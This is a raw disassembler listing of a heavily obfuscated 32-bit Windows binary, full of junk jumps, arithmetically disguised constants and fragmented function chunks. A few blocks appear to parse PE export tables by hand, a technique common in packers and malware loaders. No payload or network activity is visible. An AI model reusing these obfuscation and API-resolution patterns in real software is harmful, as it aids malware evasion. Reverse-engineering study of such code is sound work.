; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_4409F3: ; CODE XREF: sub_4445DC+1357Dj
jnz loc_455328
jmp loc_44A8A5
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_4409FE: ; CODE XREF: sub_445AD1:loc_442E88j
jge loc_43A393
loc_440A04: ; CODE XREF: sub_456590-21C4j
jmp loc_43C31B
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
push 0AFE5FF7Dh
jmp loc_43A388
; ---------------------------------------------------------------------------
push ecx
mov ecx, [esp+10h]
mov dword ptr [ecx], 10001h
lea eax, loc_43CEE8
push edi
push offset loc_43D6C0
jmp loc_440770
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_440A2F: ; CODE XREF: sub_43D364+1424Fj
; sub_44825D:loc_45287Bj
jge loc_444578
add ebp, ebx
jmp loc_455179
; END OF FUNCTION CHUNK FOR sub_44825D
; ---------------------------------------------------------------------------
loc_440A3C: ; CODE XREF: ut7h7i2x:0044ED67j
jle loc_45A365
xor esi, ebx
jmp sub_44C852
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_440A49: ; CODE XREF: sub_43CCC3:loc_44B10Fj
xor esi, 7C5215FAh
jmp loc_43C21A
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_440A54: ; CODE XREF: sub_44E5DC-10C39j
cmp al, 0A4h
jz loc_4518E6
jmp loc_4489D3
; END OF FUNCTION CHUNK FOR sub_44E5DC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_440A61: ; CODE XREF: sub_44D5BE-4070j
jnz loc_44002C
loc_440A67: ; CODE XREF: ut7h7i2x:00454959j
jmp nullsub_291
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
shl ebx, 6
or eax, edi
and edx, edi
jmp loc_44F56D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443A45
loc_440A78: ; CODE XREF: sub_443A45+B3A4j
adc edi, 5C534D38h
loc_440A7E: ; CODE XREF: sub_443A45:loc_44EDDBj
push offset sub_452FE5
jmp loc_4508D6
; END OF FUNCTION CHUNK FOR sub_443A45
; =============== S U B R O U T I N E =======================================
sub_440A88 proc near ; CODE XREF: sub_43BB85:loc_459F88j
push ebp
mov eax, [ebp-20h]
call sub_44EEB2
pop ecx
mov [ebp-20h], eax
jmp loc_450ECA
sub_440A88 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FC60
loc_440A9A: ; CODE XREF: sub_44FC60+4j
test byte ptr [ebp-8], 40h
jz loc_450ECA
jmp sub_450EBD
; END OF FUNCTION CHUNK FOR sub_44FC60
; ---------------------------------------------------------------------------
locret_440AA9: ; CODE XREF: ut7h7i2x:loc_4530C4j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452BE9
loc_440AAA: ; CODE XREF: sub_452BE9+16j
jo loc_4410F9
xor eax, 0CBC72DF3h
ror eax, 1Ch
xor eax, 0A98B21DAh
push edi
mov edi, ecx
xchg edi, [esp+0]
push 4751E800h
jmp loc_44CE7B
; END OF FUNCTION CHUNK FOR sub_452BE9
; ---------------------------------------------------------------------------
loc_440ACF: ; CODE XREF: ut7h7i2x:0043BCC5j
add edi, 8841D21Eh
mov [edi], eax
pop edi
lea eax, sub_442E76
jmp loc_45A232
; =============== S U B R O U T I N E =======================================
sub_440AE3 proc near ; CODE XREF: sub_43F1B2:loc_43F501j
; sub_439D5C:loc_44EE14p
; FUNCTION CHUNK AT 0043AE8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D5A5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455B78 SIZE 0000001E BYTES
xchg ebx, [esp+0]
pop ebx
push eax
push 0E44F06A7h
jmp loc_44D5A5
sub_440AE3 endp
; =============== S U B R O U T I N E =======================================
sub_440AF2 proc near ; DATA XREF: sub_441765:loc_447FACo
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439B50 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043CA43 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004515F2 SIZE 00000005 BYTES
call sub_455807
mov eax, 0B98DBDD7h
push ecx
push 5B3F4B82h
pop ecx
xor ecx, 17AB9C84h
add ecx, 0B3AEB9ECh
jmp loc_4515F2
sub_440AF2 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2AA
loc_440B14: ; CODE XREF: sub_44E2AA-14D7Bj
shl esi, 0Eh
loc_440B17: ; CODE XREF: ut7h7i2x:loc_44F3B0j
call sub_441A79
push ecx
push offset loc_445EBE
jmp nullsub_110
; END OF FUNCTION CHUNK FOR sub_44E2AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458B53
loc_440B27: ; CODE XREF: sub_458B53:loc_458B5Aj
push 0A0D2A745h
pop edx
and edx, ds:4000F9h
xor edx, 0A6634FA9h
or edx, ds:4000F8h
jmp loc_43E392
; END OF FUNCTION CHUNK FOR sub_458B53
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C791
loc_440B44: ; CODE XREF: sub_44C791-1036j
adc ecx, 7D3B512Eh
xor ecx, eax
loc_440B4C: ; CODE XREF: sub_44C791:loc_4565EBj
call sub_440B52
retn
; END OF FUNCTION CHUNK FOR sub_44C791
; =============== S U B R O U T I N E =======================================
sub_440B52 proc near ; CODE XREF: sub_441AED:loc_4391F3j
; sub_44C791:loc_440B4Cp
; FUNCTION CHUNK AT 0043CFF8 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 0043DAD8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450B9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456A28 SIZE 00000010 BYTES
call sub_453D8B
mov edx, 19EDC823h
jmp loc_43DAD8
sub_440B52 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_440B61: ; CODE XREF: sub_444EAA+954Cj
sub ecx, edx
jmp loc_451295
; END OF FUNCTION CHUNK FOR sub_444EAA
; =============== S U B R O U T I N E =======================================
sub_440B68 proc near ; CODE XREF: ut7h7i2x:0043F3E7j
; sub_44D807+Fp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B053 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E370 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004460FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A175 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00455559 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456F65 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AB3B SIZE 0000000D BYTES
xchg edx, [esp+0]
pop edx
push ebp
mov ebp, edx
xchg ebp, [esp+0]
push 26512AD9h
jmp loc_44A175
sub_440B68 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_440B7C: ; CODE XREF: ut7h7i2x:loc_4586F4j
mov esi, ecx
pop ecx
loc_440B7F: ; CODE XREF: ut7h7i2x:0044433Bj
push ecx
push offset sub_44E66A
jmp locret_45ACEA
; =============== S U B R O U T I N E =======================================
sub_440B8A proc near ; CODE XREF: sub_45114D-1565Fp
; ut7h7i2x:00443F30j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00446B68 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045944E SIZE 00000006 BYTES
xchg edx, [esp+0]
pop edx
push esi
push 0FA0002FDh
xchg ecx, [esp+4+var_4]
mov esi, ecx
pop ecx
rol esi, 0Eh
jmp loc_446B68
sub_440B8A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_440BA2 proc near ; CODE XREF: ut7h7i2x:00440320j
; sub_44F943-A778p
xchg edi, [esp+0]
pop edi
add ebx, 0C33C732Fh
sub_440BA2 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_440BAC: ; CODE XREF: sub_446CA0:loc_448B38j
xchg ebx, [esp+0]
; END OF FUNCTION CHUNK FOR sub_446CA0
; START OF FUNCTION CHUNK FOR sub_43CE34
loc_440BAF: ; CODE XREF: sub_43CE34:loc_4537C1j
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_43CE34
; ---------------------------------------------------------------------------
shl edi, 9
pushf
jmp sub_44A7D2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_440BBD: ; CODE XREF: sub_4408C2:loc_442950j
or ebp, ebx
mov ebx, 0A03DFCF5h
sbb esi, 92EFF82Eh
xor eax, ebp
jmp loc_44CA7D
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
loc_440BD1: ; CODE XREF: ut7h7i2x:loc_44C32Aj
sbb esi, ebx
jmp loc_44548F
; ---------------------------------------------------------------------------
not ebx
jmp sub_446C63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_440BDF: ; CODE XREF: sub_444851+10E33j
add eax, ecx
pop ecx
mov edi, [eax]
push offset loc_457DB0
jmp nullsub_324
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4573BA
loc_440BEE: ; CODE XREF: sub_4573BA:loc_4407CBj
jz loc_458FD7
jmp loc_446BB0
; END OF FUNCTION CHUNK FOR sub_4573BA
; ---------------------------------------------------------------------------
loc_440BF9: ; CODE XREF: ut7h7i2x:0043A405j
jnz loc_43A691
popf
add esi, 147EC2DFh
sub ebp, 6BDF61Dh
jle loc_4474F5
jmp loc_4485DE
; ---------------------------------------------------------------------------
loc_440C17: ; CODE XREF: ut7h7i2x:00441677j
push 3597922Ch
pop eax
rol eax, 12h
jnb loc_4397F4
loc_440C26: ; CODE XREF: ut7h7i2x:00446A66j
jmp loc_44BC3D
; ---------------------------------------------------------------------------
loc_440C2B: ; CODE XREF: ut7h7i2x:0044633Bj
jmp locret_43E6E5
; ---------------------------------------------------------------------------
loc_440C30: ; CODE XREF: ut7h7i2x:0043CF53j
jmp loc_448AED
; ---------------------------------------------------------------------------
sbb esi, 13EC7229h
jmp loc_4397F2
; ---------------------------------------------------------------------------
sbb eax, 70C37E64h
ror ecx, 0Eh
jmp sub_43DAC5
; ---------------------------------------------------------------------------
loc_440C4E: ; DATA XREF: sub_440783+Do
push esi
push 365D360Ah
pop esi
or esi, 4E99C457h
xor esi, 8131D28Ah
jmp loc_4507FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A4C0
loc_440C66: ; CODE XREF: sub_44A4C0:loc_44AC3Bj
pop ecx
add ecx, 0F89FDA11h
rol ecx, 0Ch
xor ecx, 3F94DE6h
sub ecx, 0EF715FCEh
push offset loc_454E3D
jmp loc_44AFF3
; END OF FUNCTION CHUNK FOR sub_44A4C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_440C86: ; CODE XREF: sub_4508DB:loc_43FEEAj
; ut7h7i2x:loc_455AA4j
jz loc_443D12
jmp loc_448517
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
loc_440C91: ; CODE XREF: ut7h7i2x:0043A6A1j
jl loc_43AA0F
; START OF FUNCTION CHUNK FOR sub_44949C
loc_440C97: ; CODE XREF: sub_44949C+Cj
xor edx, 0C584E715h
push edi
push offset sub_459C1B
jmp nullsub_451
; END OF FUNCTION CHUNK FOR sub_44949C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_440CA8: ; CODE XREF: sub_457A66:loc_4440ACj
add edx, 0C0D5FF1Ch
rol edx, 18h
jb loc_45715E
loc_440CB7: ; CODE XREF: sub_45967C-17325j
jmp loc_439D00
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
cdq
or edx, 4EA70031h
jmp loc_45715E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F6E5
loc_440CC8: ; CODE XREF: sub_43F6E5:loc_45A743j
mov eax, [eax]
add eax, [ebp-4]
add eax, 18h
mov [ebp-10h], eax
mov eax, [ebp-10h]
; END OF FUNCTION CHUNK FOR sub_43F6E5
; START OF FUNCTION CHUNK FOR sub_439788
loc_440CD6: ; CODE XREF: sub_439788:loc_43A7B1j
mov eax, [eax+60h]
jmp loc_445168
; END OF FUNCTION CHUNK FOR sub_439788
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4502F0
loc_440CDE: ; CODE XREF: sub_4502F0:loc_43ACD9j
pop ecx
; END OF FUNCTION CHUNK FOR sub_4502F0
; START OF FUNCTION CHUNK FOR sub_4528B1
loc_440CDF: ; CODE XREF: sub_4528B1:loc_4528B6j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_4528B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_440CE2: ; CODE XREF: ut7h7i2x:00446402j
jmp loc_440240
; ---------------------------------------------------------------------------
loc_440CE7: ; CODE XREF: ut7h7i2x:00440089j
jmp loc_454EA9
; =============== S U B R O U T I N E =======================================
sub_440CEC proc near ; CODE XREF: sub_442C22+Fp
; sub_4502F0+4p
var_14 = dword ptr -14h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043B7D3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D298 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004430D2 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00444F79 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447B71 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00449F9B SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044BC51 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EB22 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00450F00 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00453417 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E6A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004556E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B58 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00459BC0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A55C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045AB18 SIZE 00000012 BYTES
push ebp
jmp loc_453417
sub_440CEC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
xchg edx, [ebx]
adc ebx, 1A1B22A8h
jmp sub_43BDD6
; ---------------------------------------------------------------------------
locret_440D00: ; CODE XREF: ut7h7i2x:loc_43FEC8j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C2ED
loc_440D01: ; CODE XREF: sub_44C2ED+Dj
jmp loc_43F1E6
; END OF FUNCTION CHUNK FOR sub_44C2ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452D3D
loc_440D06: ; CODE XREF: sub_452D3D-14466j
jmp loc_44B327
; END OF FUNCTION CHUNK FOR sub_452D3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_440D0B: ; CODE XREF: sub_43CCC3:loc_44B18Aj
; sub_445056+AACCj
call sub_453D8B
push 0A1F27E50h
xchg ecx, [esp+4+var_4]
mov edx, ecx
pop ecx
and edx, 0D8083979h
xor edx, 0ECC50501h
jmp loc_44D393
; END OF FUNCTION CHUNK FOR sub_445056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_440D2C: ; CODE XREF: sub_449700+391Fj
sbb eax, 9B78B58Eh
sbb edx, ecx
loc_440D34: ; CODE XREF: sub_457A66:loc_43A883j
; sub_457A66-1C1B6j ...
jmp loc_44ACFC
; ---------------------------------------------------------------------------
loc_440D39: ; CODE XREF: sub_449700:loc_439A5Ej
; sub_457A66-9FEFj
call sub_456AD6
loc_440D3E: ; CODE XREF: ut7h7i2x:loc_43D33Fj
; ut7h7i2x:0043D35Ej
add edi, 0D4430C44h
xchg edi, [esp+4+var_4]
jmp loc_43E776
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
jmp ds:dword_41D0F0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_78. PRESS KEYPAD "+" TO EXPAND]
db 85h
dd 0CADh, 0ED1E9h, 240C8700h, 8B59E98Bh, 4487D405h, 0FC00900h
dd 14EF985h, 8469E900h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_440D76: ; CODE XREF: ut7h7i2x:004405A2j
sub ebp, eax
; START OF FUNCTION CHUNK FOR sub_44B122
loc_440D78: ; CODE XREF: sub_44B122:loc_440596j
xor eax, 0BB5062B8h
add eax, ebp
add eax, 0B865C0B7h
push ebp
mov ebp, eax
jmp loc_44B94A
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAA4
loc_440D8E: ; CODE XREF: sub_44CAA4-3186j
lea edx, [ebp-14h]
mov eax, offset dword_43E380
call sub_43F058
lea eax, [ebp-14h]
jmp loc_457214
; END OF FUNCTION CHUNK FOR sub_44CAA4
; =============== S U B R O U T I N E =======================================
sub_440DA3 proc near ; CODE XREF: sub_44CAA4+7j
; FUNCTION CHUNK AT 0043F2F6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004425A0 SIZE 00000005 BYTES
add esp, 0FFFFFFECh
jmp loc_43F2F6
sub_440DA3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_440DAB proc near ; DATA XREF: ut7h7i2x:loc_446EB5o
; FUNCTION CHUNK AT 004530AD SIZE 00000005 BYTES
mov byte ptr [eax], 0C3h
jmp loc_4530AD
sub_440DAB endp
; =============== S U B R O U T I N E =======================================
sub_440DB3 proc near ; CODE XREF: sub_41A2D8+132p
; ut7h7i2x:0044C11Fj
; DATA XREF: ...
; FUNCTION CHUNK AT 00442D01 SIZE 00000005 BYTES
push offset loc_447888
jmp loc_442D01
sub_440DB3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_440DBD: ; CODE XREF: sub_44EC11+294j
xchg edi, [esp+8+var_8]
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
push eax
mov eax, ebp
xchg eax, [esp]
mov ebp, esp
loc_440DCD: ; CODE XREF: ut7h7i2x:loc_453E69j
push eax
push ecx
push edx
push ebx
jmp loc_43A56B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E70F
loc_440DD6: ; CODE XREF: sub_44E70F:loc_451CA7j
push edx
push 982A8CB8h
pop edx
and edx, 0D0BD7EADh
rol edx, 13h
add edx, 9AFD5044h
mov [edx], eax
jmp loc_444500
; END OF FUNCTION CHUNK FOR sub_44E70F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_440DF3: ; CODE XREF: sub_44BF76+E866j
push 0D14785BFh
jg loc_4507CB
; END OF FUNCTION CHUNK FOR sub_44BF76
; START OF FUNCTION CHUNK FOR sub_44B85E
loc_440DFE: ; CODE XREF: sub_44B85E:loc_45A7B8j
or eax, 0EE24469Dh
add eax, 42920C1h
push ecx
pushf
; END OF FUNCTION CHUNK FOR sub_44B85E
; START OF FUNCTION CHUNK FOR sub_43B9B1
loc_440E0C: ; CODE XREF: sub_43B9B1:loc_441718j
push 0D01A4884h
pop ecx
jmp loc_454081
; END OF FUNCTION CHUNK FOR sub_43B9B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_440E17: ; CODE XREF: sub_44865D-126Dj
; sub_44865D:loc_449E63j
cmp dword ptr [ebp-1C8h], 2B584245h
jnz loc_456C31
jmp loc_446656
; END OF FUNCTION CHUNK FOR sub_44865D
; =============== S U B R O U T I N E =======================================
sub_440E2C proc near ; DATA XREF: sub_43E592:loc_43C135o
pop ebp
retn
sub_440E2C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449808
loc_440E2E: ; CODE XREF: sub_449808+EDA9j
jmp loc_442C3E
; END OF FUNCTION CHUNK FOR sub_449808
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E766
loc_440E33: ; CODE XREF: sub_43E766+81FFj
jmp loc_4428AF
; END OF FUNCTION CHUNK FOR sub_43E766
; =============== S U B R O U T I N E =======================================
sub_440E38 proc near ; CODE XREF: sub_44EB88:loc_4477EEj
; sub_43E592:loc_451868p ...
; FUNCTION CHUNK AT 0045A53B SIZE 00000007 BYTES
push 0D0E93E3Bh
pop eax
xor eax, 6C2B3BA9h
or eax, 0CFDBD616h
jmp loc_45A53B
sub_440E38 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455AD6
loc_440E4F: ; CODE XREF: sub_455AD6j
mov eax, [esp+0]
push edx
push eax
mov eax, ebx
xchg eax, [esp+8+var_8]
jmp loc_4502D4
; END OF FUNCTION CHUNK FOR sub_455AD6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_285. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_440E5F proc near ; DATA XREF: sub_459F30:loc_459F35o
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004476C2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044B798 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044EFEF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453C51 SIZE 0000001C BYTES
pop ebp
jns loc_453C65
mov eax, [esp-4+arg_0]
push edx
call sub_4508DB
mov eax, 26F528F2h
call sub_43AA94
jmp loc_453C51
sub_440E5F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_440E7E: ; CODE XREF: sub_445AD1-BC52j
push ecx
push 83C8E3CFh
pop ecx
add ecx, 78517941h
rol ecx, 1Dh
add ecx, 2826FE97h
sub eax, ecx
pop ecx
jmp loc_444624
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_440E9C: ; CODE XREF: sub_43C1E5:loc_452D38j
jnz loc_454526
loc_440EA2: ; CODE XREF: ut7h7i2x:0043A8DDj
jmp loc_444847
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
push 3CC7F898h
jmp loc_443867
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CAA4
loc_440EB1: ; CODE XREF: sub_44CAA4+A785j
call sub_44C068
call nullsub_13
loc_440EBB: ; CODE XREF: sub_44CAA4-318Cj
; sub_453D07-2622j
mov eax, ds:dword_43E36C
mov [ebp-4], eax
loc_440EC3: ; CODE XREF: sub_44941C:loc_45830Ej
jmp loc_44F765
; END OF FUNCTION CHUNK FOR sub_44CAA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_440EC8: ; CODE XREF: sub_452B14:loc_459CEAj
jz loc_4566DB
loc_440ECE: ; CODE XREF: ut7h7i2x:loc_43EF68j
jmp loc_445359
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
push 0DA4C48DAh
jmp loc_4416C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_440EDD: ; CODE XREF: sub_43BA9E+Bj
push offset sub_44DD39
jmp nullsub_37
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_440EE8: ; CODE XREF: sub_43F7A5:loc_459601j
push ecx
push 2E32E9C8h
pop ecx
and ecx, 3B562630h
xor ecx, 0ECA43766h
xor eax, ecx
jmp loc_442F05
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_440F02: ; CODE XREF: sub_442B3B+4B2j
; ut7h7i2x:00443007j
or ecx, 3E669950h
xor ecx, 26E30DD8h
call sub_4428C8
loc_440F13: ; CODE XREF: sub_439B38+7j
jmp sub_452D3D
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_440F18: ; CODE XREF: sub_439BF8:loc_43B621j
jnz loc_4484F2
; END OF FUNCTION CHUNK FOR sub_439BF8
; START OF FUNCTION CHUNK FOR sub_446258
loc_440F1E: ; CODE XREF: sub_446258:loc_449451j
jmp loc_4495C5
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_440F23: ; CODE XREF: sub_458345-12323j
test esi, 7D7B5549h
jmp loc_44A108
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4433C5
loc_440F2E: ; CODE XREF: sub_4433C5+1270Cj
jbe loc_443A5F
jmp loc_4445CF
; ---------------------------------------------------------------------------
loc_440F39: ; CODE XREF: sub_4433C5:loc_43EA57j
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_4445CF
jmp loc_450F8C
; END OF FUNCTION CHUNK FOR sub_4433C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4583E7
loc_440F4D: ; CODE XREF: sub_4583E7-1908Dj
pop ebp
xchg ecx, [esp-4+arg_0]
mov edx, ecx
pop ecx
xchg ecx, [esp-8+arg_4]
mov eax, ecx
pop ecx
pop ebx
jmp loc_458CFE
; END OF FUNCTION CHUNK FOR sub_4583E7
; ---------------------------------------------------------------------------
loc_440F60: ; CODE XREF: ut7h7i2x:00448549j
jle loc_458474
add esi, 0EBC96A96h
jmp loc_43BC43
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B5CF
loc_440F71: ; CODE XREF: sub_44B5CF:loc_45631Dj
mov eax, [ebp+0]
jmp loc_43FDA6
; END OF FUNCTION CHUNK FOR sub_44B5CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_187. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F0B0
loc_440F7A: ; CODE XREF: sub_43F0B0+4A13j
jmp loc_4548B1
; END OF FUNCTION CHUNK FOR sub_43F0B0
; ---------------------------------------------------------------------------
loc_440F7F: ; DATA XREF: sub_4393B6+Ao
push edi
mov edi, ebp
xchg edi, [esp]
mov ebp, esp
push ecx
push ebp
jmp loc_4531F9
; =============== S U B R O U T I N E =======================================
sub_440F8E proc near ; CODE XREF: ut7h7i2x:00458123j
; sub_4589E0+Ap
; FUNCTION CHUNK AT 00443284 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004491D9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449627 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C268 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004537BC SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [ebp-10h]
loc_440F95: ; CODE XREF: sub_444113+12j
mov eax, [eax+60h]
add eax, [ebp-4]
mov [ebp-14h], eax
mov eax, [ebp-14h]
mov eax, [eax+18h]
jmp loc_4491D9
sub_440F8E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4576A2
loc_440FA9: ; CODE XREF: sub_4576A2:loc_448527j
mov esi, ebp
xchg esi, [esp+0]
push offset sub_458CBB
; END OF FUNCTION CHUNK FOR sub_4576A2
; START OF FUNCTION CHUNK FOR sub_450E41
loc_440FB3: ; CODE XREF: sub_450E41:loc_452E1Aj
jmp loc_4467F9
; END OF FUNCTION CHUNK FOR sub_450E41
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F943
loc_440FB8: ; CODE XREF: sub_44F943+Ej
jnz loc_442505
jmp loc_444D78
; END OF FUNCTION CHUNK FOR sub_44F943
; =============== S U B R O U T I N E =======================================
sub_440FC3 proc near ; CODE XREF: sub_43E766+1p
; ut7h7i2x:004475A1j ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00450A06 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004530B3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E5A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004586BD SIZE 0000000E BYTES
xchg ecx, [esp+0]
pop ecx
push 724998D1h
pop edx
or edx, 23C8BDAAh
jmp loc_4586BD
sub_440FC3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453790
loc_440FD8: ; CODE XREF: sub_453790:loc_4406E7j
push eax
call sub_4554BD
push ecx
push 0B1D7C2D1h
pop ecx
xor ecx, 91F52985h
or ecx, 6148CF21h
loc_440FF1: ; CODE XREF: ut7h7i2x:0043B3EFj
jmp loc_446127
; END OF FUNCTION CHUNK FOR sub_453790
; ---------------------------------------------------------------------------
loc_440FF6: ; DATA XREF: sub_449FD5:loc_4441DCo
add eax, 0E492EB2Ch
